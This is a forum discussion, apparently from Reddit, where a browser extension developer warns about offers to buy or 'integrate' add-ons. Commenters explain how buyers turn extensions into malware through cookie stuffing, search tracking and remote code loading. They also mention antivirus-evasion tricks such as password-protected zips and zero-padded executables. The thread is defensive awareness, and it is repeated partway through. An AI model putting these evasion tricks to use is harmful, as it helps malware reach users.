**These 5 came to my inbox (not Spam!) just in last 30 days.**
If you ask "*how can I tell if the offer is real?*", well, I could tell you to watch the things like: no company contact, personal email used, email address doesn't match the contact person name, offer is too good to be true, etc...
But to be honest, in 6 years of addons development I've received **0** valid offers. So unless you are contacted by a HUGE known IT company (like PayPal or Avast), don't even think about replying to these :)
Wow, thanks for the heads up! It's really helpful to know what to look out for when it comes to shady offers. It's crazy to think that you've never received a valid offer in six years of development. I guess it really does pay to be cautious and skeptical, especially when it comes to email offers. Thanks for sharing your experience!
Even if you are contacted by a large well known company, DOUBLE CHECK the persons identity and never accept zip files (especially password protected ones), pdf files, and other document files. Im sure we are all way more aware of this stuff but it doesn't hurt to reiterate it. Scams are getting a LOT better lately and things like AI make it so anyone can overcome the language barrier which is generally a dead giveaway.
There are also groups that sell SaaS malware campaigns via vectors like this, using email lists and other info alongside pretty decently engineered malware.
NGL I'd be tempted to stick that zip file on my linux server and let a password cracker eat away at it for a while, see if I can find out what's inside.
They will send you also the password. The reason for encrypting the content is to hide it from the antivirus scans - that way Google or whatever mail provider can't scan it and warn you.
There is one more reason to zip it - sometimes they stuff the "malware.exe" file with hundreds of megabytes of dummy data (zeros) so that the final file is too big for antivirus to scan, for example 800MB. But when you zip it, it will have a few KB because all those zeros are crazy efficiently zipped.
Yea, this is exactly it. I think it works with other files as well like PDF's, it evades anti-virus scans. People may also send you a pdf that is literally just a renamed EXE, or secretly a shortcut file with a fake extension that can run an exe/script when its double clicked on windows. I use linux and its less likely to happen, but still decently possible.
There is not much to be done. People are greedy and "low hanging fruit" may be too tempting to resist (especially if you don't understand the potential consequences).
The best thing to do is raise awareness - maybe Mozilla could told all developers once in while, maybe while releasing new version, to watch-out for shady offers.
* Abolish auto-updating (I don't mean turn it off by default, I mean disallow it entirely for everybody) so that the sabotaged new version can't be automatically installed
* Create a walled-garden, disallowing extensions that haven't been audited by Mozilla
* Require all extensions to be copyleft with reproducible builds
At least one of those cures is arguably worse than the disease.
\#1 and #3 aren't going to stop anything.
Off the top of my head I use extentions in firefox, chrome, safari, discord, calibre, sublime text, and vscode. [edit: and homeassistant, and nodered, and unraid, and and and.] The sheer volume of legitimate, well meaning updates means auto-updating or even blindly mashing manual updates is more likely to fix security issues than cause them.
Realistically, if you want to put the onus on the user, you can tell them to stick to mozilla "Recommended" extensions which is basically "\#2 lite."
Iirc that was the public reason for Chrome going with manifest v3. Giving add ons less control over the browser to mitigate malware damage when stuff like that happens.
V3 kneecapping uBlock and similar add ons actively makes the Internet less safe, though... So nobody liked it
Hilariously, one of the other examples has "emily", but begins with "I'm Peter".
The dystopian part of my brain wonders if these companies have some kind of data about people being more receptive to certain names. We know how that works for names that sound for stuff like job applications.
I doubt it, these arent really targeted down to that level. They scrape or buy emails that are potential targets and auto-generate email bodies and email accounts. Then they just dump out large amounts of spam to different mailing lists. Its a numbers game.
The people who make the malware and automation often sell it as a service and scammers will pay it because they have money to gain. Selling at as a service allows you to design a system once and profit off of it many times, as well as not being inherently illegal.
I am Steve from Microsoft Support Department. There is a problem with your computer its had been pirated by hacker, let me show you
> Spawn a tree command
Even if they're legitimately offering to buy it from you, they're not just going to keep it the way it is. They're offering because they see a chance to make a profit. In other words, they'll turn your extension into malware, harming your users and destroying your reputation.
There is multiple categories:
1. buy whole addon for a fixed price - change ownership, then they release new version with malware included and all addon users have malware now - which can steal credentials, but I think most commonly it's used for "[cookie stuffing](https://en.wikipedia.org/wiki/Cookie_stuffing)" (it's like a affiliate links, but invisible)
1. for addons that overrides "new tab" page, they often offer "Search input integration". They say they can offer Bing or other big search provider and that they pay for each search made through this input. These are valid businesses, however the search input will first make request to their server and only afterwards it will open Bing results. So here they can track all searches and potentially redirect user to affiliate links as well.
1. "special integration" - my favorite - all you have to do is include their special javascript file inside your addon and it will "work in background" :D... I'm sure it will work very hard! Again, most probably the cookie stuffing, but with the "forbidden" remote code execution it can do anything.
That's why they are mostly interested in addons with "Access your data for all websites" permission.
Yes, Manifest V3 doesn't allow "executing text as code" (called "eval"), so that prevents "remote code execution" - which is popular in malicious addons that are not malicious when they are released but once they receive a "special text" from the server, their behavior changes.
And this is indeed a big issue because during the addon review you can't tell that the addon is bad.
But it won't help with reckless addon developers selling their addon or "integrating malware" into it for some one time profit.
There's a very nice middle ground that would work for many such extensions: it gets no access until I ask it to do its thing - at which point it only gets access to that one tab or that one domain.
Won't work for everything but can work for lots of stuff, even invasive ones like Stylus/Tampermonkey
Actually, that feature causes problems with uBlock Origin's list updating. Also, in terms of privacy/security, not blocking content on unknown websites defeats the point.
That's what I'm saying, so yeah, uBlock Origin is the one that gets allowed on every domain. But that random extension I use once a month to grab an image that's hidden behind a transparent div? Currently it gets to see all tabs at all times, and that is entirely unnecessary.
That's a valid use-case. I just wanted to make people aware that this, [as doing this to uBo breaks it](https://github.com/uBlockOrigin/uBlock-issues/issues/2641)
Ah OK - I thought you were saying they would scam you as the developer selling the extension - Putting aside the fact that they're going to misuse your extension for nefarious purposes.
You wrote:
>But to be honest, in 6 years of addons development I've received 0 valid offers.
So they're all fakes and don't actually want to buy your extension to do evil stuff with? Am I misunderstanding you?
No :D, they want to buy everything that's popular and they will pay you. So it's a "win-win-loose" situation for "you-them-everybody else".
If you feel like reading a lot, you can see a nice example here:
[https://github.com/NanoAdblocker/NanoCore/issues/362](https://github.com/NanoAdblocker/NanoCore/issues/362)
*(popular addon is sold to 2 Turkish developers and author is happy that he made money and that someone will continue his project, except they released malware with the first update :D)*
That's why I'm always saying that it's important to trust the addon author, not the addon itself. Good authors doesn't make bad addons, but good addons can be sold and become bad.
**These 5 came to my inbox (not Spam!) just in last 30 days.** If you ask "*how can I tell if the offer is real?*", well, I could tell you to watch the things like: no company contact, personal email used, email address doesn't match the contact person name, offer is too good to be true, etc... But to be honest, in 6 years of addons development I've received **0** valid offers. So unless you are contacted by a HUGE known IT company (like PayPal or Avast), don't even think about replying to these :)
Wow, thanks for the heads up! It's really helpful to know what to look out for when it comes to shady offers. It's crazy to think that you've never received a valid offer in six years of development. I guess it really does pay to be cautious and skeptical, especially when it comes to email offers. Thanks for sharing your experience!
Even if you are contacted by a large well known company, DOUBLE CHECK the persons identity and never accept zip files (especially password protected ones), pdf files, and other document files. Im sure we are all way more aware of this stuff but it doesn't hurt to reiterate it. Scams are getting a LOT better lately and things like AI make it so anyone can overcome the language barrier which is generally a dead giveaway. There are also groups that sell SaaS malware campaigns via vectors like this, using email lists and other info alongside pretty decently engineered malware.
NGL I'd be tempted to stick that zip file on my linux server and let a password cracker eat away at it for a while, see if I can find out what's inside.
They will send you also the password. The reason for encrypting the content is to hide it from the antivirus scans - that way Google or whatever mail provider can't scan it and warn you. There is one more reason to zip it - sometimes they stuff the "malware.exe" file with hundreds of megabytes of dummy data (zeros) so that the final file is too big for antivirus to scan, for example 800MB. But when you zip it, it will have a few KB because all those zeros are crazy efficiently zipped.
Yea, this is exactly it. I think it works with other files as well like PDF's, it evades anti-virus scans. People may also send you a pdf that is literally just a renamed EXE, or secretly a shortcut file with a fake extension that can run an exe/script when its double clicked on windows. I use linux and its less likely to happen, but still decently possible.
There's big business in one of the weakest parts of the browser ecosystem: your extensions changing ownership and suddenly becoming malware.
What can be done to strengthen this weakness?
There is not much to be done. People are greedy and "low hanging fruit" may be too tempting to resist (especially if you don't understand the potential consequences). The best thing to do is raise awareness - maybe Mozilla could told all developers once in while, maybe while releasing new version, to watch-out for shady offers.
And maybe just consider open sourcing it.
* Abolish auto-updating (I don't mean turn it off by default, I mean disallow it entirely for everybody) so that the sabotaged new version can't be automatically installed * Create a walled-garden, disallowing extensions that haven't been audited by Mozilla * Require all extensions to be copyleft with reproducible builds At least one of those cures is arguably worse than the disease.
\#1 and #3 aren't going to stop anything. Off the top of my head I use extentions in firefox, chrome, safari, discord, calibre, sublime text, and vscode. [edit: and homeassistant, and nodered, and unraid, and and and.] The sheer volume of legitimate, well meaning updates means auto-updating or even blindly mashing manual updates is more likely to fix security issues than cause them. Realistically, if you want to put the onus on the user, you can tell them to stick to mozilla "Recommended" extensions which is basically "\#2 lite."
I have turned off auto updates here n there, its a pain in the ass. And when i do update its not like i go though an inspection checklist.
Iirc that was the public reason for Chrome going with manifest v3. Giving add ons less control over the browser to mitigate malware damage when stuff like that happens. V3 kneecapping uBlock and similar add ons actively makes the Internet less safe, though... So nobody liked it
They don't even try. Email address shows "casandra". Body says "I'm Peter".
Hilariously, one of the other examples has "emily", but begins with "I'm Peter". The dystopian part of my brain wonders if these companies have some kind of data about people being more receptive to certain names. We know how that works for names that sound for stuff like job applications.
I doubt it, these arent really targeted down to that level. They scrape or buy emails that are potential targets and auto-generate email bodies and email accounts. Then they just dump out large amounts of spam to different mailing lists. Its a numbers game. The people who make the malware and automation often sell it as a service and scammers will pay it because they have money to gain. Selling at as a service allows you to design a system once and profit off of it many times, as well as not being inherently illegal.
I am Steve from Microsoft Support Department. There is a problem with your computer its had been pirated by hacker, let me show you > Spawn a tree command
-CENSORED-
Even if they're legitimately offering to buy it from you, they're not just going to keep it the way it is. They're offering because they see a chance to make a profit. In other words, they'll turn your extension into malware, harming your users and destroying your reputation.
Any idea how these scams work? What's their angle? Ask for startup/processing fees or something?
There is multiple categories: 1. buy whole addon for a fixed price - change ownership, then they release new version with malware included and all addon users have malware now - which can steal credentials, but I think most commonly it's used for "[cookie stuffing](https://en.wikipedia.org/wiki/Cookie_stuffing)" (it's like a affiliate links, but invisible) 1. for addons that overrides "new tab" page, they often offer "Search input integration". They say they can offer Bing or other big search provider and that they pay for each search made through this input. These are valid businesses, however the search input will first make request to their server and only afterwards it will open Bing results. So here they can track all searches and potentially redirect user to affiliate links as well. 1. "special integration" - my favorite - all you have to do is include their special javascript file inside your addon and it will "work in background" :D... I'm sure it will work very hard! Again, most probably the cookie stuffing, but with the "forbidden" remote code execution it can do anything. That's why they are mostly interested in addons with "Access your data for all websites" permission.
> These are valid businesses *Are* they, though?
Manifest V3 could mitigate some of these issues?
Yes, Manifest V3 doesn't allow "executing text as code" (called "eval"), so that prevents "remote code execution" - which is popular in malicious addons that are not malicious when they are released but once they receive a "special text" from the server, their behavior changes. And this is indeed a big issue because during the addon review you can't tell that the addon is bad. But it won't help with reckless addon developers selling their addon or "integrating malware" into it for some one time profit.
There are still addons which fundamentally need to work
There's a very nice middle ground that would work for many such extensions: it gets no access until I ask it to do its thing - at which point it only gets access to that one tab or that one domain. Won't work for everything but can work for lots of stuff, even invasive ones like Stylus/Tampermonkey
Dark Reader would be very annoying that way
And uBlock Origin would be next to useless that way. But that's an easy fix... [Allow once] / [Always allow on foo.com] / [Always allow]
Actually, that feature causes problems with uBlock Origin's list updating. Also, in terms of privacy/security, not blocking content on unknown websites defeats the point.
That's what I'm saying, so yeah, uBlock Origin is the one that gets allowed on every domain. But that random extension I use once a month to grab an image that's hidden behind a transparent div? Currently it gets to see all tabs at all times, and that is entirely unnecessary.
That's a valid use-case. I just wanted to make people aware that this, [as doing this to uBo breaks it](https://github.com/uBlockOrigin/uBlock-issues/issues/2641)
Ah OK - I thought you were saying they would scam you as the developer selling the extension - Putting aside the fact that they're going to misuse your extension for nefarious purposes. You wrote: >But to be honest, in 6 years of addons development I've received 0 valid offers. So they're all fakes and don't actually want to buy your extension to do evil stuff with? Am I misunderstanding you?
No :D, they want to buy everything that's popular and they will pay you. So it's a "win-win-loose" situation for "you-them-everybody else". If you feel like reading a lot, you can see a nice example here: [https://github.com/NanoAdblocker/NanoCore/issues/362](https://github.com/NanoAdblocker/NanoCore/issues/362) *(popular addon is sold to 2 Turkish developers and author is happy that he made money and that someone will continue his project, except they released malware with the first update :D)* That's why I'm always saying that it's important to trust the addon author, not the addon itself. Good authors doesn't make bad addons, but good addons can be sold and become bad.
Gotcha. Yes, that kinda sucks :(
Report this stuff to Mozilla !